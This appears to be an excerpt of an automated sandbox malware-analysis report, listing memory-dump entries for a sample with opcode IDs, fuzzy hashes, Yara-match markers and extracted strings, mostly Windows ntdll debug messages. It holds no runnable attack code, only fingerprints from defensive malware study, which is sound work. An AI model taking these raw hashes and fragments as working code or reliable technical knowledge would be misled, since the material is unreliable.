                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                                            • Instruction ID: 2951800ecd747d0ccfc2c4f400d9cfc64155826e34570222680cfc33e030aa3b
                                                            • Opcode Fuzzy Hash: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                                            • Instruction Fuzzy Hash: 36E08C32100564ABC211FB5DDD50F8A739AEBA4660F000125F1918B690CA20AC40CB94
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                            • Instruction ID: c174f30d911eb8ccf7d94b892b613ffd27a186445535cb34fca37e9e1a2b0c50
                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                            • Instruction Fuzzy Hash: 7CE08633111A1487D728DE18D512BB677E4EF45720F09863EA65347780C534E548C794
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                            • Instruction ID: 577dea735589853ff36bf6e45b93f67328906d29a60356893eb8c9abe3482633
                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                            • Instruction Fuzzy Hash: 96D05E36511A50AFC3329F1BEA00C53FBF9FBC4A10705063EA54583924C771A806CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction ID: 970dd3b3c8e17fb52561004913e76f8ec2b0dc8a3445bc41578d87bd48ae0a24
                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction Fuzzy Hash: 16D0A932204A28ABD732AA1CFC00FC333E8BB88720F060459B008CB050C3A0AC81CA84
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction ID: 99ad4a9cae9d4a16737c9a51ca7ed2992dede0f20f40cccc6bf74d4b35edbc6b
                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction Fuzzy Hash: 99E0EC759517889BDF16DF59C640F9EBBB9BB94B40F151058A1485F664C724A900CB40
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction ID: ba496ee634c882761525fbe9166fb621853a937c417ec66ffdf887267be2b772
                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction Fuzzy Hash: 54D02232322070D7CB3857556840FE76905EB80A90F0A006D340A93800C0058C82C2E0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                            • Instruction ID: 460564d6b5842fadf77d8cceb97f206a8717b7275f720674891e70bddd896060
                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                            • Instruction Fuzzy Hash: 65D012771D064DBBCB119F66DC01F957BA9E764BA0F445020B5048B5A0C63AE950D684
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                                            • Instruction ID: ccb97b03ad99cd3d6eefb2abd4ad410b99286f2f9c87e9413597452a6d7ac296
                                                            • Opcode Fuzzy Hash: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                                            • Instruction Fuzzy Hash: 6ED0A730A01249CBEF1ECF08C612E6E36B0FB50640B40007CF74051821D325EC01C700
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction ID: 477a968a0da935ae8058236d77ef6dba0ccd5d185319ad2db0faab5b993d2083
                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction Fuzzy Hash: 4BD09235612E80CFD65ACB0CC5A4B2533E4BB84A44F8104E0E445CBB26D628E950CA00
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction ID: 86681701bcd605a77b2211518c4e26e24b2716146c1f228a5ed19d26b17d9425
                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction Fuzzy Hash: 9EC01232290648AFC712AB99CD01F427BA9EBA8B40F000021F2048B670C631E820EA84
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction ID: bff56f7bca8b667f83ac3c5607c5b5f703418733df1e7d047e24966c02f4e3fe
                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction Fuzzy Hash: 89D01236200248EFCB01DF51C890D9A776AFBD8710F108019FD19076118A75ED62DA50
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction ID: a11dfc0a2422f5e358c61ebe76d35e60960afd63835eed4e6c5757aba4b4de2c
                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction Fuzzy Hash: C6C04C797016428FCF16DB5DD694F4577E4F744740F150890E845CB721E724E801CA11
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                            • Instruction ID: 4a8e756debd19aec5e2cec7661c933f06e68ba7a04c1400247d3915b6bcc3fa9
                                                            • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                            • Instruction Fuzzy Hash: 65B01232212545DFC7026721CB04B5832EDBF017C0F0900F465408D830D6188910E501
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                            • Instruction ID: 6ec35449439df6366f94fec8566b0ee965970dc0b6282e12473d8c69a02d0df5
                                                            • Opcode Fuzzy Hash: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                            • Instruction Fuzzy Hash: 0E900232645800139144715859845469005A7E1301B55C021E0425554CCB148A565361
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                            • Instruction ID: 82ccc2b3fa0c1030cfe64393dba005efcba6c4be80408e0bc750da9cd9f3b995
                                                            • Opcode Fuzzy Hash: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                            • Instruction Fuzzy Hash: 3F90026264150043414471585904406B005A7E2301395C125A0555560CC71889559369
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                            • Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
                                                            • Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                            • Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                            • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                                            • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                            • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                            • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                                            • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                            • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                            • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                                            • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                            • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                            • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                                            • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                            • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                            • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                                            • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                            • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                            • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                                            • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                            • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                                            Strings
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                            • ExecuteOptions, xrefs: 011346A0
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                            • Execute=1, xrefs: 01134713
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                            • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                                            • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                            • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 0113031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                            • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                                            • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                            • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 01137BAC
                                                            • RTL: Resource at %p, xrefs: 01137B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                            • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                                            • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                            • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 011372C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                            • RTL: Resource at %p, xrefs: 011372A3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                            • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                                            • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                            • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                            • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                                            • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                            • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                            • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                                            • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                            • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$_$`+$f$i>$m$t$t>$yv$zv$}$}
                                                            • API String ID: 0-3942510243
                                                            • Opcode ID: 34dbab3bbfc58d652faed2701552f44ca4fe3bea269c61074578397d08601640
                                                            • Instruction ID: 03efe5b68eee065839ec6d1881a47c3d5fb293421df2559f160f5782665bf645
                                                            • Opcode Fuzzy Hash: 34dbab3bbfc58d652faed2701552f44ca4fe3bea269c61074578397d08601640
                                                            • Instruction Fuzzy Hash: A1428BB0E05268DFEB68CF45C8947DDBBB2BB45308F2481D9C24E6B284DB755A88CF45
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
